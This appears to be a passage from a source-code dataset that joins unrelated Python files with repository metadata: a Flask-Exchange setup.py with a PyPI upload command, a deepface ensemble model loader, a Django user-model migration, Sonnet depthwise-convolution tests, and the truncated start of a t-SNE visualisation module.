class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests', 'examples')),
# If your package is a single module, use this instead of 'packages':
# py_modules=['mypackage'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Framework :: Flask',
'Topic :: Office/Business :: Groupware',
'License :: OSI Approved :: MIT License',
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
| 29.695035
| 86
| 0.633389
|
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
NAME = 'Flask-Exchange'
DESCRIPTION = 'Exchange support for Flask using ExchangeLib.'
URL = 'https://github.com/jscurtu/flask-exchange'
EMAIL = 'jscurtu@gmail.com'
AUTHOR = 'Jason Scurtu'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = '0.0.2'
REQUIRED = [
'flask>=0.10.1', 'exchangelib>=1.12.0', 'urllib3'
]
EXTRAS = {
}
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(os.path.join(here, NAME, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
class UploadCommand(Command):
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests', 'examples')),
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
'Framework :: Flask',
'Topic :: Office/Business :: Groupware',
'License :: OSI Approved :: MIT License',
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
cmdclass={
'upload': UploadCommand,
},
)
| true
| true
|
1c4214d2e36cfc42beb2859a091fcdd9139c8678
| 2,019
|
py
|
Python
|
deepface/basemodels/Boosting.py
|
olive380/deepface
|
630e8e72f591eee63c724cb8cbcbbc66712f93fc
|
[
"MIT"
] | 2
|
2021-03-24T07:06:56.000Z
|
2021-04-09T15:08:13.000Z
|
deepface/basemodels/Boosting.py
|
olive380/deepface
|
630e8e72f591eee63c724cb8cbcbbc66712f93fc
|
[
"MIT"
] | null | null | null |
deepface/basemodels/Boosting.py
|
olive380/deepface
|
630e8e72f591eee63c724cb8cbcbbc66712f93fc
|
[
"MIT"
] | 2
|
2021-04-09T15:09:27.000Z
|
2021-08-06T17:57:03.000Z
|
from deepface import DeepFace
from tqdm import tqdm
import os
from os import path
from pathlib import Path
import numpy as np
import gdown
from deepface.commons import functions, distance as dst
def loadModel():
model_names = ['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace']
model = {}
model_pbar = tqdm(range(0, 4), desc='Face recognition models')
for index in model_pbar:
model_name = model_names[index]
model_pbar.set_description("Loading %s" % (model_name))
model[model_name] = DeepFace.build_model(model_name)
return model
def validate_model(model):
#validate model dictionary because it might be passed from input as pre-trained
found_models = []
for key, value in model.items():
found_models.append(key)
if ('VGG-Face' in found_models) and ('Facenet' in found_models) and ('OpenFace' in found_models) and ('DeepFace' in found_models):
#print("Ensemble learning will be applied for ", found_models," models")
valid = True
else:
missing_ones = set(['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace']) - set(found_models)
raise ValueError("You'd like to apply ensemble method and pass pre-built models but models must contain [VGG-Face, Facenet, OpenFace, DeepFace] but you passed "+str(found_models)+". So, you need to pass "+str(missing_ones)+" models as well.")
def build_gbm():
#this is not a must dependency
import lightgbm as lgb #lightgbm==2.3.1
home = str(Path.home())
if os.path.isfile(home+'/.deepface/weights/face-recognition-ensemble-model.txt') != True:
print("face-recognition-ensemble-model.txt will be downloaded...")
url = 'https://raw.githubusercontent.com/serengil/deepface/master/deepface/models/face-recognition-ensemble-model.txt'
output = home+'/.deepface/weights/face-recognition-ensemble-model.txt'
gdown.download(url, output, quiet=False)
ensemble_model_path = home+'/.deepface/weights/face-recognition-ensemble-model.txt'
deepface_ensemble = lgb.Booster(model_file = ensemble_model_path)
return deepface_ensemble
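# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# loadModel() builds the four base recognition models the ensemble expects, validate_model()
# guards against an incomplete dictionary, and build_gbm() fetches the pre-trained LightGBM
# booster. The sketch assumes network access for the weight downloads and that the optional
# lightgbm dependency is installed.
if __name__ == "__main__":
    models = loadModel()       # {'VGG-Face': ..., 'Facenet': ..., 'OpenFace': ..., 'DeepFace': ...}
    validate_model(models)     # raises ValueError if any of the four models is missing
    ensemble = build_gbm()     # lightgbm Booster used to combine the per-model distances
    print(type(ensemble))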
| 33.65
| 244
| 0.741951
|
from deepface import DeepFace
from tqdm import tqdm
import os
from os import path
from pathlib import Path
import numpy as np
import gdown
from deepface.commons import functions, distance as dst
def loadModel():
model_names = ['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace']
model = {}
model_pbar = tqdm(range(0, 4), desc='Face recognition models')
for index in model_pbar:
model_name = model_names[index]
model_pbar.set_description("Loading %s" % (model_name))
model[model_name] = DeepFace.build_model(model_name)
return model
def validate_model(model):
found_models = []
for key, value in model.items():
found_models.append(key)
if ('VGG-Face' in found_models) and ('Facenet' in found_models) and ('OpenFace' in found_models) and ('DeepFace' in found_models):
valid = True
else:
missing_ones = set(['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace']) - set(found_models)
raise ValueError("You'd like to apply ensemble method and pass pre-built models but models must contain [VGG-Face, Facenet, OpenFace, DeepFace] but you passed "+str(found_models)+". So, you need to pass "+str(missing_ones)+" models as well.")
def build_gbm():
#this is not a must dependency
import lightgbm as lgb #lightgbm==2.3.1
home = str(Path.home())
if os.path.isfile(home+'/.deepface/weights/face-recognition-ensemble-model.txt') != True:
print("face-recognition-ensemble-model.txt will be downloaded...")
url = 'https://raw.githubusercontent.com/serengil/deepface/master/deepface/models/face-recognition-ensemble-model.txt'
output = home+'/.deepface/weights/face-recognition-ensemble-model.txt'
gdown.download(url, output, quiet=False)
ensemble_model_path = home+'/.deepface/weights/face-recognition-ensemble-model.txt'
deepface_ensemble = lgb.Booster(model_file = ensemble_model_path)
return deepface_ensemble
| true
| true
|
1c4214ef8c07af7c6afe258f74e0b3e443f397d4
| 2,278
|
py
|
Python
|
accounts/migrations/0001_initial.py
|
bilesanmiahmad/weight-tracker
|
6badd70d0b1005fb96ec354dece3e2e5f3f016e3
|
[
"MIT"
] | null | null | null |
accounts/migrations/0001_initial.py
|
bilesanmiahmad/weight-tracker
|
6badd70d0b1005fb96ec354dece3e2e5f3f016e3
|
[
"MIT"
] | null | null | null |
accounts/migrations/0001_initial.py
|
bilesanmiahmad/weight-tracker
|
6badd70d0b1005fb96ec354dece3e2e5f3f016e3
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.6 on 2018-06-18 10:33
import accounts.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('first_name', models.CharField(max_length=70, verbose_name='first name')),
('last_name', models.CharField(max_length=70, verbose_name='last name')),
('avatar', models.ImageField(blank=True, null=True, upload_to='users/avatars/')),
('date_joined', models.DateTimeField(auto_now_add=True, verbose_name='date joined')),
('is_active', models.BooleanField(default=True, verbose_name='active')),
('is_staff', models.BooleanField(default=False, verbose_name='staff')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
managers=[
('objects', accounts.models.NewManager()),
],
),
]
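# Usage note (hedged: the app label and settings wiring are assumptions based on the
# "accounts" path above). Django only honours a custom user model such as this one if
# it is configured before the first migrate, e.g.
#
#     # settings.py
#     AUTH_USER_MODEL = "accounts.User"
#
# and the migration is then applied with:
#
#     python manage.py migrate accounts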
| 54.238095
| 266
| 0.634767
|
import accounts.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('first_name', models.CharField(max_length=70, verbose_name='first name')),
('last_name', models.CharField(max_length=70, verbose_name='last name')),
('avatar', models.ImageField(blank=True, null=True, upload_to='users/avatars/')),
('date_joined', models.DateTimeField(auto_now_add=True, verbose_name='date joined')),
('is_active', models.BooleanField(default=True, verbose_name='active')),
('is_staff', models.BooleanField(default=False, verbose_name='staff')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
managers=[
('objects', accounts.models.NewManager()),
],
),
]
| true
| true
|
1c4215e580012b8cf3f0bf5efeb4374d96ab1b0d
| 8,357
|
py
|
Python
|
sonnet/src/depthwise_conv_test.py
|
ScriptBox99/deepmind-sonnet
|
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
|
[
"Apache-2.0"
] | 10,287
|
2017-04-07T12:33:37.000Z
|
2022-03-30T03:32:16.000Z
|
sonnet/src/depthwise_conv_test.py
|
ScriptBox99/deepmind-sonnet
|
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
|
[
"Apache-2.0"
] | 209
|
2017-04-07T15:57:11.000Z
|
2022-03-27T10:43:03.000Z
|
sonnet/src/depthwise_conv_test.py
|
ScriptBox99/deepmind-sonnet
|
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
|
[
"Apache-2.0"
] | 1,563
|
2017-04-07T13:15:06.000Z
|
2022-03-29T15:26:04.000Z
|
# Copyright 2019 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sonnet.v2.src.depthwise_conv."""
from absl.testing import parameterized
import numpy as np
from sonnet.src import depthwise_conv
from sonnet.src import initializers
from sonnet.src import test_utils
import tensorflow as tf
def create_constant_initializers(w, b, with_bias):
if with_bias:
return {
"w_init": initializers.Constant(w),
"b_init": initializers.Constant(b)
}
else:
return {"w_init": initializers.Constant(w)}
class DepthwiseConvTest(test_utils.TestCase, parameterized.TestCase):
def testInitializerKeysInvalidWithoutBias(self):
with self.assertRaisesRegex(ValueError, "b_init must be None"):
depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
data_format="NHWC",
with_bias=False,
b_init=tf.zeros_initializer())
@parameterized.parameters(tf.float32, tf.float64)
def testDefaultInitializers(self, dtype):
if "TPU" in self.device_types and dtype == tf.float64:
self.skipTest("Double precision not supported on TPU.")
conv1 = depthwise_conv.DepthwiseConv2D(
kernel_shape=16, stride=1, padding="VALID", data_format="NHWC")
out = conv1(tf.random.normal([8, 64, 64, 1], dtype=dtype))
self.assertAllEqual(out.shape, [8, 49, 49, 1])
self.assertEqual(out.dtype, dtype)
# Note that for unit variance inputs the output is below unit variance
# because of the use of the truncated normal initializer
err = 0.2 if self.primary_device == "TPU" else 0.1
self.assertNear(out.numpy().std(), 0.87, err=err)
@parameterized.named_parameters(("SamePaddingUseBias", True, "SAME"),
("SamePaddingNoBias", False, "SAME"),
("ValidPaddingNoBias", False, "VALID"),
("ValidPaddingUseBias", True, "VALID"))
def testFunction(self, with_bias, padding):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
stride=1,
padding=padding,
with_bias=with_bias,
data_format="NHWC",
**create_constant_initializers(1.0, 1.0, with_bias))
conv2 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
stride=1,
padding=padding,
with_bias=with_bias,
data_format="NHWC",
**create_constant_initializers(1.0, 1.0, with_bias))
defun_conv = tf.function(conv2)
iterations = 5
for _ in range(iterations):
x = tf.random.uniform([1, 5, 5, 1])
y1 = conv1(x)
y2 = defun_conv(x)
self.assertAllClose(self.evaluate(y1), self.evaluate(y2), atol=1e-4)
def testUnknownBatchSizeNHWC(self):
x = tf.TensorSpec([None, 5, 5, 3], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c).get_concrete_function(x)
out1 = defun_conv(tf.ones([3, 5, 5, 3]))
self.assertEqual(out1.shape, [3, 5, 5, 3])
out2 = defun_conv(tf.ones([5, 5, 5, 3]))
self.assertEqual(out2.shape, [5, 5, 5, 3])
def testUnknownBatchSizeNCHW(self):
if self.primary_device == "CPU":
self.skipTest("NCHW not supported on CPU")
x = tf.TensorSpec([None, 3, 5, 5], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NCHW")
defun_conv = tf.function(c).get_concrete_function(x)
out1 = defun_conv(tf.ones([3, 3, 5, 5]))
self.assertEqual(out1.shape, [3, 3, 5, 5])
out2 = defun_conv(tf.ones([5, 3, 5, 5]))
self.assertEqual(out2.shape, [5, 3, 5, 5])
def testUnknownSpatialDims(self):
x = tf.TensorSpec([3, None, None, 3], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c).get_concrete_function(x)
out = defun_conv(tf.ones([3, 5, 5, 3]))
expected_out = c(tf.ones([3, 5, 5, 3]))
self.assertEqual(out.shape, [3, 5, 5, 3])
self.assertAllEqual(self.evaluate(out), self.evaluate(expected_out))
out = defun_conv(tf.ones([3, 4, 4, 3]))
expected_out = c(tf.ones([3, 4, 4, 3]))
self.assertEqual(out.shape, [3, 4, 4, 3])
self.assertAllEqual(self.evaluate(out), self.evaluate(expected_out))
@parameterized.parameters(True, False)
def testUnknownChannels(self, autograph):
x = tf.TensorSpec([3, 3, 3, None], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c, autograph=autograph)
with self.assertRaisesRegex(ValueError,
"The number of input channels must be known"):
defun_conv.get_concrete_function(x)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationSame(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="SAME",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 1]))
expected_out = np.array([[5, 7, 7, 7, 5], [7, 10, 10, 10, 7],
[7, 10, 10, 10, 7], [7, 10, 10, 10, 7],
[5, 7, 7, 7, 5]])
if not with_bias:
expected_out -= 1
self.assertEqual(out.shape, [1, 5, 5, 1])
self.assertAllClose(np.reshape(out.numpy(), [5, 5]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationValid(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="VALID",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 1]))
expected_out = np.array([[10, 10, 10], [10, 10, 10], [10, 10, 10]])
if not with_bias:
expected_out -= 1
self.assertEqual(out.shape, [1, 3, 3, 1])
self.assertAllClose(np.reshape(out.numpy(), [3, 3]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationValidMultiChannel(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="VALID",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 3]))
expected_out = np.array([[[10] * 3] * 3] * 3)
if not with_bias:
expected_out -= 1
self.assertAllClose(np.reshape(out.numpy(), [3, 3, 3]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testSharing(self, with_bias):
"""Sharing is working."""
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=3,
kernel_shape=3,
stride=1,
padding="SAME",
with_bias=with_bias)
x = np.random.randn(1, 5, 5, 1)
x1 = tf.constant(x, dtype=np.float32)
x2 = tf.constant(x, dtype=np.float32)
self.assertAllClose(conv1(x1), conv1(x2))
# Kernel shape was set to 3, which is expanded to the spatial shape [3, 3].
# Input channels are 1, output channels := in_channels * channel_multiplier,
# and channel_multiplier was set to 3. So the weight layout must be
# (kernel_h, kernel_w, in_channels, channel_multiplier) == (3, 3, 1, 3).
w = np.random.randn(3, 3, 1, 3) # Now change the weights.
conv1.w.assign(w)
self.assertAllClose(conv1(x1), conv1(x2))
if __name__ == "__main__":
tf.test.main()
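# A small sketch of the weight layout exercised above, assuming the standard
# TensorFlow depthwise convention (tf.nn.depthwise_conv2d) that the module wraps:
#
#     import tensorflow as tf
#     x = tf.ones([1, 5, 5, 2])                      # NHWC input, 2 channels
#     w = tf.ones([3, 3, 2, 4])                      # (kh, kw, in_channels, channel_multiplier)
#     y = tf.nn.depthwise_conv2d(x, w, strides=[1, 1, 1, 1], padding="SAME")
#     assert y.shape == (1, 5, 5, 8)                 # out_channels = in_channels * multiplier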
| 35.411017
| 78
| 0.642216
|
from absl.testing import parameterized
import numpy as np
from sonnet.src import depthwise_conv
from sonnet.src import initializers
from sonnet.src import test_utils
import tensorflow as tf
def create_constant_initializers(w, b, with_bias):
if with_bias:
return {
"w_init": initializers.Constant(w),
"b_init": initializers.Constant(b)
}
else:
return {"w_init": initializers.Constant(w)}
class DepthwiseConvTest(test_utils.TestCase, parameterized.TestCase):
def testInitializerKeysInvalidWithoutBias(self):
with self.assertRaisesRegex(ValueError, "b_init must be None"):
depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
data_format="NHWC",
with_bias=False,
b_init=tf.zeros_initializer())
@parameterized.parameters(tf.float32, tf.float64)
def testDefaultInitializers(self, dtype):
if "TPU" in self.device_types and dtype == tf.float64:
self.skipTest("Double precision not supported on TPU.")
conv1 = depthwise_conv.DepthwiseConv2D(
kernel_shape=16, stride=1, padding="VALID", data_format="NHWC")
out = conv1(tf.random.normal([8, 64, 64, 1], dtype=dtype))
self.assertAllEqual(out.shape, [8, 49, 49, 1])
self.assertEqual(out.dtype, dtype)
err = 0.2 if self.primary_device == "TPU" else 0.1
self.assertNear(out.numpy().std(), 0.87, err=err)
@parameterized.named_parameters(("SamePaddingUseBias", True, "SAME"),
("SamePaddingNoBias", False, "SAME"),
("ValidPaddingNoBias", False, "VALID"),
("ValidPaddingUseBias", True, "VALID"))
def testFunction(self, with_bias, padding):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
stride=1,
padding=padding,
with_bias=with_bias,
data_format="NHWC",
**create_constant_initializers(1.0, 1.0, with_bias))
conv2 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
stride=1,
padding=padding,
with_bias=with_bias,
data_format="NHWC",
**create_constant_initializers(1.0, 1.0, with_bias))
defun_conv = tf.function(conv2)
iterations = 5
for _ in range(iterations):
x = tf.random.uniform([1, 5, 5, 1])
y1 = conv1(x)
y2 = defun_conv(x)
self.assertAllClose(self.evaluate(y1), self.evaluate(y2), atol=1e-4)
def testUnknownBatchSizeNHWC(self):
x = tf.TensorSpec([None, 5, 5, 3], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c).get_concrete_function(x)
out1 = defun_conv(tf.ones([3, 5, 5, 3]))
self.assertEqual(out1.shape, [3, 5, 5, 3])
out2 = defun_conv(tf.ones([5, 5, 5, 3]))
self.assertEqual(out2.shape, [5, 5, 5, 3])
def testUnknownBatchSizeNCHW(self):
if self.primary_device == "CPU":
self.skipTest("NCHW not supported on CPU")
x = tf.TensorSpec([None, 3, 5, 5], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NCHW")
defun_conv = tf.function(c).get_concrete_function(x)
out1 = defun_conv(tf.ones([3, 3, 5, 5]))
self.assertEqual(out1.shape, [3, 3, 5, 5])
out2 = defun_conv(tf.ones([5, 3, 5, 5]))
self.assertEqual(out2.shape, [5, 3, 5, 5])
def testUnknownSpatialDims(self):
x = tf.TensorSpec([3, None, None, 3], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c).get_concrete_function(x)
out = defun_conv(tf.ones([3, 5, 5, 3]))
expected_out = c(tf.ones([3, 5, 5, 3]))
self.assertEqual(out.shape, [3, 5, 5, 3])
self.assertAllEqual(self.evaluate(out), self.evaluate(expected_out))
out = defun_conv(tf.ones([3, 4, 4, 3]))
expected_out = c(tf.ones([3, 4, 4, 3]))
self.assertEqual(out.shape, [3, 4, 4, 3])
self.assertAllEqual(self.evaluate(out), self.evaluate(expected_out))
@parameterized.parameters(True, False)
def testUnknownChannels(self, autograph):
x = tf.TensorSpec([3, 3, 3, None], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c, autograph=autograph)
with self.assertRaisesRegex(ValueError,
"The number of input channels must be known"):
defun_conv.get_concrete_function(x)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationSame(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="SAME",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 1]))
expected_out = np.array([[5, 7, 7, 7, 5], [7, 10, 10, 10, 7],
[7, 10, 10, 10, 7], [7, 10, 10, 10, 7],
[5, 7, 7, 7, 5]])
if not with_bias:
expected_out -= 1
self.assertEqual(out.shape, [1, 5, 5, 1])
self.assertAllClose(np.reshape(out.numpy(), [5, 5]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationValid(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="VALID",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 1]))
expected_out = np.array([[10, 10, 10], [10, 10, 10], [10, 10, 10]])
if not with_bias:
expected_out -= 1
self.assertEqual(out.shape, [1, 3, 3, 1])
self.assertAllClose(np.reshape(out.numpy(), [3, 3]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationValidMultiChannel(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="VALID",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 3]))
expected_out = np.array([[[10] * 3] * 3] * 3)
if not with_bias:
expected_out -= 1
self.assertAllClose(np.reshape(out.numpy(), [3, 3, 3]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testSharing(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=3,
kernel_shape=3,
stride=1,
padding="SAME",
with_bias=with_bias)
x = np.random.randn(1, 5, 5, 1)
x1 = tf.constant(x, dtype=np.float32)
x2 = tf.constant(x, dtype=np.float32)
self.assertAllClose(conv1(x1), conv1(x2))
w = np.random.randn(3, 3, 1, 3)
conv1.w.assign(w)
self.assertAllClose(conv1(x1), conv1(x2))
if __name__ == "__main__":
tf.test.main()
| true
| true
|
1c4218b85311fa77639a3d344b13425637df0161
| 13,317
|
py
|
Python
|
metrics/visualisation.py
|
leosampaio/scene-designer
|
8a7276067acfde1997d386942aabc44d92436a1a
|
[
"MIT"
] | 9
|
2021-08-18T17:49:42.000Z
|
2022-02-22T02:15:07.000Z
|
metrics/visualisation.py
|
leosampaio/scene-designer
|
8a7276067acfde1997d386942aabc44d92436a1a
|
[
"MIT"
] | null | null | null |
metrics/visualisation.py
|
leosampaio/scene-designer
|
8a7276067acfde1997d386942aabc44d92436a1a
|
[
"MIT"
] | 1
|
2021-10-02T19:53:03.000Z
|
2021-10-02T19:53:03.000Z
|
import os
import numpy as np
from sklearn.manifold import TSNE
from sklearn.decomposition import PCA
import skimage.transform as sk_transform
from sklearn.cluster import KMeans
from PIL import Image
from core.metrics import ProjectionMetric, ImageMetric
class TSNEProjection(ProjectionMetric):
name = 'tsne'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
# [194, 103, 317, 100, 112, 221, 223, 293, 239, 8],
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y, pred_z = y[idx], pred_z[idx]
for label, feature in zip(y, pred_z):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
return np.concatenate((tsne_results, labels),
axis=1)
class TSNEImagesProjection(ImageMetric):
name = 'tsne-images'
input_type = 'features_and_images'
def compute(self, input_data):
feats, images = input_data
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
tx, ty = tsne_results[:, 0], tsne_results[:, 1]
